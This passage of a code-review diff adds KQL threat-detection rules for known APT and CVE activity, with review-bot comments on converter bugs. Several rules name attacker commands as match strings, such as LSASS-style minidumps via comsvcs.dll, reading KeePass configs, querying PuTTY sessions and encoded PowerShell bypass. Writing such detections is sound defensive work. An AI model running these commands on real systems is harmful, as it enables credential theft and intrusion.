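Review bot: `ProcessCommandLine =~ "*--load-extension=\"*\\Appdata\\local\\chrome\"*"` is a case-insensitive equality test, and KQL does not treat `*` as a wildcard, so this rule only fires on a command line that literally equals that string, asterisks included — effectively never. The Sigma wildcard pattern should be split into substring tests: `ProcessCommandLine contains "--load-extension=\"" and ProcessCommandLine contains "\\Appdata\\local\\chrome\""`. Any other generated rule where the converter emitted `=~` against a value containing `*` likely has the same problem and is worth a grep.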
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql b/KQL/rules-emerging-threats/Privilege Escalation/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql
new file mode 100644
index 00000000..4093e401
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql
@@ -0,0 +1,14 @@
+// Title: Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788)
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-20
+// Level: medium
+// Description: Detects a qlogin.exe command attempting to authenticate as the internal `_+_PublicSharingUser_` using a GUID as the password.
+This could be an indicator of an attacker exploiting CVE-2025-57788 to gain initial access using leaked credentials.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.initial-access, attack.t1078.001, detection.emerging-threats, cve.2025-57788
+// False Positives:
+// - Legitimate administrative scripts that use the `_+_PublicSharingUser_` account for valid purposes.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "qlogin" and ProcessCommandLine contains "_+_PublicSharingUser_") and ProcessCommandLine matches regex "[A-F0-9]{8}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{12}"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/defrag_deactivation.kql b/KQL/rules-emerging-threats/Privilege Escalation/defrag_deactivation.kql
new file mode 100644
index 00000000..42e82d5a
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/defrag_deactivation.kql
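Review bot: The description continuation line `This could be an indicator of an attacker exploiting CVE-2025-57788 ...` is emitted without the `//` prefix, so it is not a comment and the file is no longer a valid KQL query. Every line of a multi-line description needs the prefix, `// This could be an indicator ...`; the same defect is visible in both forest_blizzard hunks and in the guloader, kapeka_backdoor_persistence_activity, lummac and nsswitch hunks below, so the fix belongs in the converter's header emitter rather than in the individual files. Also, `matches regex` is case-sensitive in KQL, so the `[A-F0-9]` GUID pattern misses lowercase GUIDs; `(?i)[A-F0-9]{8}-...` or `[A-Fa-f0-9]` is the safer form.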
@@ -0,0 +1,10 @@
+// Title: Defrag Deactivation
+// Author: Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)
+// Date: 2019-03-04
+// Level: medium
+// Description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.s0111, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/delete" or ProcessCommandLine contains "/change") and (ProcessCommandLine contains "/TN" and ProcessCommandLine contains "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag") and FolderPath endswith "\\schtasks.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/exploiting_cve_2019_1388.kql b/KQL/rules-emerging-threats/Privilege Escalation/exploiting_cve_2019_1388.kql
new file mode 100644
index 00000000..1ab20b16
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/exploiting_cve_2019_1388.kql
@@ -0,0 +1,10 @@
+// Title: Exploiting CVE-2019-1388
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-11-20
+// Level: critical
+// Description: Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1068, cve.2019-1388, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " http" and FolderPath endswith "\\iexplore.exe" and InitiatingProcessFolderPath endswith "\\consent.exe") and ((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) or (AccountName contains "AUTHORI" or AccountName contains "AUTORI"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_creation.kql b/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_creation.kql
new file mode 100644
index 00000000..b8420249
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_creation.kql
@@ -0,0 +1,14 @@
+// Title: Forest Blizzard APT - Custom Protocol Handler Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-04-23
+// Level: high
+// Description: Detects the setting of a custom protocol handler with the name "rogue".
+Seen being created by Forest Blizzard APT as reported by MSFT.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "{026CC6D7-34B2-33D5-B551-CA31EB6CE345}" and RegistryKey contains "\\PROTOCOLS\\Handler\\rogue\\CLSID"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql b/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql
new file mode 100644
index 00000000..18a4b420
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql
@@ -0,0 +1,14 @@
+// Title: Forest Blizzard APT - Custom Protocol Handler DLL Registry Set
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-04-23
+// Level: high
+// Description: Detects the setting of the DLL that handles the custom protocol handler.
+Seen being created by Forest Blizzard APT as reported by MSFT.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where RegistryValueData endswith ".dll" and RegistryKey contains "\\CLSID\\{026CC6D7-34B2-33D5-B551-CA31EB6CE345}\\Server"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/hafnium_exchange_exploitation_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/hafnium_exchange_exploitation_activity.kql
new file mode 100644
index 00000000..00179650
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/hafnium_exchange_exploitation_activity.kql
@@ -0,0 +1,12 @@
+// Title: HAFNIUM Exchange Exploitation Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-03-09
+// Level: critical
+// Description: Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1546, attack.t1053, attack.g0125, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -t7z " and ProcessCommandLine contains "C:\\Programdata\\pst" and ProcessCommandLine contains "\\it.zip") or (ProcessCommandLine contains "attrib" and ProcessCommandLine contains " +h " and ProcessCommandLine contains " +s " and ProcessCommandLine contains " +r " and ProcessCommandLine contains ".aspx") or ((ProcessCommandLine contains "inetpub\\wwwroot\\" and ProcessCommandLine contains ".dmp.zip") and FolderPath endswith "\\makecab.exe") or ((ProcessCommandLine contains "Microsoft\\Exchange Server\\" or ProcessCommandLine contains "compressionmemory" or ProcessCommandLine contains ".gif") and FolderPath endswith "\\makecab.exe") or (FolderPath endswith "Opera_browser.exe" and (InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe")) or FolderPath endswith "Users\\Public\\opera\\Opera_browser.exe" or (ProcessCommandLine contains "Windows\\Temp\\xx.bat" or ProcessCommandLine contains "Windows\\WwanSvcdcs" or ProcessCommandLine contains "Windows\\Temp\\cw.exe") or (ProcessCommandLine contains "\\comsvcs.dll" and ProcessCommandLine contains "Minidump" and ProcessCommandLine contains "full " and ProcessCommandLine contains "\\inetpub\\wwwroot") or (FolderPath contains "\\ProgramData\\VSPerfMon\\" or (ProcessCommandLine contains "schtasks" and ProcessCommandLine contains "VSPerfMon")) or (ProcessCommandLine contains "vssadmin list shadows" and 
ProcessCommandLine contains "Temp\\__output")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/injected_browser_process_spawning_rundll32_guloader_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/injected_browser_process_spawning_rundll32_guloader_activity.kql
new file mode 100644
index 00000000..d91c5c3f
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/injected_browser_process_spawning_rundll32_guloader_activity.kql
@@ -0,0 +1,14 @@
+// Title: Injected Browser Process Spawning Rundll32 - GuLoader Activity
+// Author: @kostastsale
+// Date: 2023-08-07
+// Level: high
+// Description: Detects the execution of installed GuLoader malware on the host.
+GuLoader is initiating network connections via the rundll32.exe process that is spawned via a browser parent(injected) process.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine endswith "\\rundll32.exe" and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/installerfiletakeover_lpe_cve_2021_41379_file_create_event.kql b/KQL/rules-emerging-threats/Privilege Escalation/installerfiletakeover_lpe_cve_2021_41379_file_create_event.kql
new file mode 100644
index 00000000..8c3c6f0c
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/installerfiletakeover_lpe_cve_2021_41379_file_create_event.kql
@@ -0,0 +1,12 @@
+// Title: InstallerFileTakeOver LPE CVE-2021-41379 File Create Event
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-11-22
+// Level: critical
+// Description: Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1068, detection.emerging-threats
+// False Positives:
+// - Possibly some Microsoft Edge upgrades
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\msiexec.exe" and FolderPath endswith "\\elevation_service.exe" and FolderPath startswith "C:\\Program Files (x86)\\Microsoft\\Edge\\Application"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_autorun_persistence.kql b/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_autorun_persistence.kql
new file mode 100644
index 00000000..725f8d15
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_autorun_persistence.kql
@@ -0,0 +1,10 @@
+// Title: Kapeka Backdoor Autorun Persistence
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-07-03
+// Level: high
+// Description: Detects the setting of a new value in the Autorun key that is used by the Kapeka backdoor for persistence.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats
+
+DeviceRegistryEvents
+| where (RegistryValueData contains ":\\WINDOWS\\system32\\rundll32.exe" and RegistryValueData contains ".wll" and RegistryValueData contains "#1") and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" and (RegistryKey endswith "\\Sens Api" or RegistryKey endswith "\\OneDrive")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_persistence_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_persistence_activity.kql
new file mode 100644
index 00000000..be69d3b9
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_persistence_activity.kql
@@ -0,0 +1,17 @@
+// Title: Kapeka Backdoor Persistence Activity
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-07-03
+// Level: high
+// Description: Detects Kapeka backdoor persistence activity.
+Depending on the process privileges, the Kapeka dropper then sets persistence for the backdoor either as a scheduled task (if admin or SYSTEM) or autorun registry (if not).
+For the scheduled task, it creates a scheduled task called "Sens Api" via schtasks command, which is set to run upon system startup as SYSTEM.
+To establish persistence through the autorun utility, it adds an autorun entry called "Sens Api" under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run via the "reg add" command.
+Both persistence mechanisms are set to launch the binary by calling rundll32 and passing the backdoor's first export ordinal (#1) without any additional argument.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains "create" and ProcessCommandLine contains "ONSTART") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")) or ((ProcessCommandLine contains "add" and ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe"))) and ((ProcessCommandLine contains "Sens Api" or ProcessCommandLine contains "OneDrive") and (ProcessCommandLine contains "rundll32" and ProcessCommandLine contains ".wll" and ProcessCommandLine contains "#1"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/leviathan_registry_key_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/leviathan_registry_key_activity.kql
new file mode 100644
index 00000000..5fcfcb55
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/leviathan_registry_key_activity.kql
@@ -0,0 +1,10 @@
+// Title: Leviathan Registry Key Activity
+// Author: Aidan Bracher
+// Date: 2020-07-07
+// Level: critical
+// Description: Detects registry key used by Leviathan APT in Malaysian focused campaign
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntkd"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql b/KQL/rules-emerging-threats/Privilege Escalation/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql
new file mode 100644
index 00000000..3470acc4
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql
@@ -0,0 +1,13 @@
+// Title: Lummac Stealer Activity - Execution Of More.com And Vbc.exe
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2024-12-19
+// Level: high
+// Description: Detects the execution of more.com and vbc.exe in the process tree.
+This behavior was observed by a set of samples related to Lummac Stealer.
+The Lummac payload is injected into the vbc.exe process.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055, detection.emerging-threats
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\vbc.exe" or ProcessVersionInfoOriginalFileName =~ "vbc.exe") and InitiatingProcessFolderPath endswith "\\more.com"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql b/KQL/rules-emerging-threats/Privilege Escalation/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql
new file mode 100644
index 00000000..f2124a96
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql
@@ -0,0 +1,16 @@
+// Title: Non-Standard Nsswitch.Conf Creation - Potential CVE-2025-32463 Exploitation
+// Author: Swachchhanda Shrawn Poudel (Nextron Systems)
+// Date: 2025-10-02
+// Level: high
+// Description: Detects the creation of nsswitch.conf files in non-standard directories, which may indicate exploitation of CVE-2025-32463.
+This vulnerability requires an attacker to create a nsswitch.conf in a directory that will be used during sudo chroot operations.
+When sudo executes, it loads malicious shared libraries from user-controlled locations within the chroot environment,
+potentially leading to arbitrary code execution and privilege escalation.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1068, cve.2025-32463, detection.emerging-threats
+// False Positives:
+// - Backup locations
+
+DeviceFileEvents
+| where FolderPath endswith "/etc/nsswitch.conf" and (not(FolderPath =~ "/etc/nsswitch.conf"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_activity.kql
new file mode 100644
index 00000000..9f188472
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_activity.kql
@@ -0,0 +1,12 @@
+// Title: OilRig APT Activity
+// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
+// Date: 2018-03-23
+// Level: critical
+// Description: Detects OilRig activity as reported by Nyotron in their March 2018 report
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.g0049, attack.t1053.005, attack.s0111, attack.t1543.003, attack.defense-evasion, attack.t1112, attack.command-and-control, attack.t1071.004, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "nslookup.exe" and ProcessCommandLine contains "-q=TXT") and InitiatingProcessFolderPath endswith "\\local\\microsoft\\Taskbar\\autoit3.exe") or (ProcessCommandLine contains "SC Scheduled Scan" and ProcessCommandLine contains "\\microsoft\\Taskbar\\autoit3.exe") or ((ProcessCommandLine contains "i" or ProcessCommandLine contains "u") and FolderPath =~ "C:\\Windows\\system32\\Service.exe") or (FolderPath contains "\\Windows\\Temp\\DB\\" and FolderPath endswith ".exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_registry_persistence.kql b/KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_registry_persistence.kql
new file mode 100644
index 00000000..bd67c52b
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_registry_persistence.kql
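Review bot: `(ProcessCommandLine contains "i" or ProcessCommandLine contains "u")` is satisfied by almost any command line, so the third branch collapses to `FolderPath =~ "C:\\Windows\\system32\\Service.exe"` and the argument test contributes nothing. If the source rule was matching a single-letter trailing argument, `ProcessCommandLine endswith " i" or ProcessCommandLine endswith " u"` preserves that intent; otherwise the clause should be dropped so the rule's effective logic is explicit. The converter's handling of very short Sigma values is presumably what produced this and is worth checking elsewhere.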
@@ -0,0 +1,12 @@
+// Title: OilRig APT Registry Persistence
+// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
+// Date: 2018-03-23
+// Level: critical
+// Description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.g0049, attack.t1053.005, attack.s0111, attack.t1543.003, attack.defense-evasion, attack.t1112, attack.command-and-control, attack.t1071.004, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UMe" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UT"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/operation_wocao_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/operation_wocao_activity.kql
new file mode 100644
index 00000000..2c629abe
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/operation_wocao_activity.kql
@@ -0,0 +1,12 @@
+// Title: Operation Wocao Activity
+// Author: Florian Roth (Nextron Systems), frack113
+// Date: 2019-12-20
+// Level: high
+// Description: Detects activity mentioned in Operation Wocao report
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.discovery, attack.t1012, attack.defense-evasion, attack.t1036.004, attack.t1027, attack.execution, attack.t1053.005, attack.t1059.001, detection.emerging-threats
+// False Positives:
+// - Administrators that use checkadmin.exe tool to enumerate local administrators
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "checkadmin.exe 127.0.0.1 -all" or ProcessCommandLine contains "netsh advfirewall firewall add rule name=powershell dir=in" or ProcessCommandLine contains "cmd /c powershell.exe -ep bypass -file c:\\s.ps1" or ProcessCommandLine contains "/tn win32times /f" or ProcessCommandLine contains "create win32times binPath=" or ProcessCommandLine contains "\\c$\\windows\\system32\\devmgr.dll" or ProcessCommandLine contains " -exec bypass -enc JgAg" or (ProcessCommandLine contains "type " and ProcessCommandLine contains "keepass\\KeePass.config.xml") or ProcessCommandLine contains "iie.exe iie.txt" or (ProcessCommandLine contains "reg query HKEY_CURRENT_USER\\Software\\" and ProcessCommandLine contains "\\PuTTY\\Sessions\\")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_activity.kql
new file mode 100644
index 00000000..58ba9e91
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_activity.kql
@@ -0,0 +1,12 @@
+// Title: Pingback Backdoor Activity
+// Author: Bhabesh Raj
+// Date: 2021-05-05
+// Level: high
+// Description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "config" and ProcessCommandLine contains "msdtc" and ProcessCommandLine contains "start" and ProcessCommandLine contains "auto") and InitiatingProcessFolderPath endswith "\\updata.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_dll_loading_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_dll_loading_activity.kql
new file mode 100644
index 00000000..8d1491ae
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_dll_loading_activity.kql
@@ -0,0 +1,12 @@
+// Title: Pingback Backdoor DLL Loading Activity
+// Author: Bhabesh Raj
+// Date: 2021-05-05
+// Level: high
+// Description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where FolderPath =~ "C:\\Windows\\oci.dll" and InitiatingProcessFolderPath endswith "\\msdtc.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_file_indicators.kql b/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_file_indicators.kql
new file mode 100644
index 00000000..5a037b2f
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_file_indicators.kql
@@ -0,0 +1,12 @@
+// Title: Pingback Backdoor File Indicators
+// Author: Bhabesh Raj
+// Date: 2021-05-05
+// Level: high
+// Description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "updata.exe" and FolderPath =~ "C:\\Windows\\oci.dll"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_actinium_persistence_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_actinium_persistence_activity.kql
new file mode 100644
index 00000000..1f97923c
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_actinium_persistence_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potential ACTINIUM Persistence Activity
+// Author: Andreas Hunkeler (@Karneades)
+// Date: 2022-02-07
+// Level: high
+// Description: Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053, attack.t1053.005, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "schtasks" and ProcessCommandLine contains "create" and ProcessCommandLine contains "wscript" and ProcessCommandLine contains " /e:vbscript"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2021_41379_exploitation_attempt.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2021_41379_exploitation_attempt.kql
new file mode 100644
index 00000000..a65a97a6
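Review bot: `InitiatingProcessFolderPath endswith "updata.exe"` lacks the leading `\\` that the sibling pingback_backdoor_activity rule uses, so it also matches any image whose name merely ends in those characters (a constructed example: `xupdata.exe`). Use `InitiatingProcessFolderPath endswith "\\updata.exe"` for consistency with the other two pingback rules and to anchor the match to the file name.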
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2021_41379_exploitation_attempt.kql
@@ -0,0 +1,10 @@
+// Title: Potential CVE-2021-41379 Exploitation Attempt
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-11-22
+// Level: critical
+// Description: Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a "cmd.exe" process as a child of Microsoft Edge elevation service "elevation_service" with "LOCAL_SYSTEM" rights
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1068, cve.2021-41379, detection.emerging-threats
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll"))) and ((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and InitiatingProcessFolderPath endswith "\\elevation_service.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2023_21554_queuejumper_exploitation.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2023_21554_queuejumper_exploitation.kql
new file mode 100644
index 00000000..e4dfdf8c
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2023_21554_queuejumper_exploitation.kql
@@ -0,0 +1,10 @@
+// Title: Potential CVE-2023-21554 QueueJumper Exploitation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-12
+// Level: high
+// Description: Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper)
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, cve.2023-21554, detection.emerging-threats
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe") and InitiatingProcessFolderPath endswith "\\Windows\\System32\\mqsvc.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2024_35250_exploitation_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2024_35250_exploitation_activity.kql
new file mode 100644
index 00000000..59154956
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2024_35250_exploitation_activity.kql
@@ -0,0 +1,14 @@
+// Title: Potential CVE-2024-35250 Exploitation Activity
+// Author: @eyezuhk Isaac Fernandes
+// Date: 2025-02-19
+// Level: medium
+// Description: Detects potentially suspicious loading of "ksproxy.ax", which may indicate an attempt to exploit CVE-2024-35250.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1068, cve.2024-35250, detection.emerging-threats
+// False Positives:
+// - Legitimate applications that use Windows Stream Interface APIs.
+// - Media applications that use DirectShow filters.
+
+DeviceImageLoadEvents
